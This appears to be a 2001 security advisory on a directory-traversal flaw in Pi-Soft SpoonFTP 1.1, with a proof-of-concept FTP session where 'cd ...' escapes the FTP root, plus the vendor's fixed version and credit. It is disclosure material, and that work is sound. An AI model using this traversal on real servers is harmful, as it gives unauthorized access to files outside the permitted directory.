Pi-Soft SpoonFTP Relative Path Vulnerability
A vulnerability exists in Pi-Soft SpoonFTP 1.1 that lets an attacker use relative paths to break out of an FTP root.
September 20, 2001
Reported September 20, 2001, byJoe Testa.
VERSION AFFECTED
· Pi-Soft SpoonFTP 1.1 for Windows 2000, Windows NT,Windows Me, and Windows 9x
DESCRIPTION
Avulnerability exists in Pi-Soft SpoonFTP 1.1 that lets an attacker use relativepaths to break out of an FTP root.
DEMONSTRATION
Joe Testa provided the following scenario asproof-of-concept:
>ftplocalhost
Connectedto xxxxxxxx.rh.rit.edu.
220SpoonFTP V1.1
User(xxxxxxxx.rh.rit.edu:(none)): jdog
331Password required.
Password:
230User logged in, proceed.
ftp>pwd
257"/" is current directory.
ftp>cd ...
250CWD command successful.
ftp>pwd
257"/..." is current directory.
ftp>
VENDOR RESPONSE
Thevendor, Pi-Soft Consulting, has releasedversion 1.1.0.1 to fixthis vulnerability.
CREDIT
Discovered by Joe Testa.
About the Author
You May Also Like